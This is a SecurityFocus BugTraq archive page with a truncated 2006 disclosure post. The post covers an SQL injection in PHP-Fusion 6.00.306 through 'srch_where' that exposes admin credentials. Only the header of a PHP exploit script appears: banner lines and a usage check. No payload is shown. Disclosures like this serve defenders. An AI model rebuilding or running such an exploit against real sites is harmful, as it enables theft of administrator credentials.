Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
PHP-Fusion <= 6.00.306 "srch_where" SQL injection / admin credentials disclosure May 16 2006 07:52PM
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on

<?

echo "PHP-Fusion <= v6.00.306 \"srch_where\" SQL Injection/Admin credentials disclosure\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n\r\n";

if ($argc<5) {

echo "Usage: php ".$argv[0]." host path user pass...

[ more ]  





 

Privacy Statement
Copyright 2009, SecurityFocus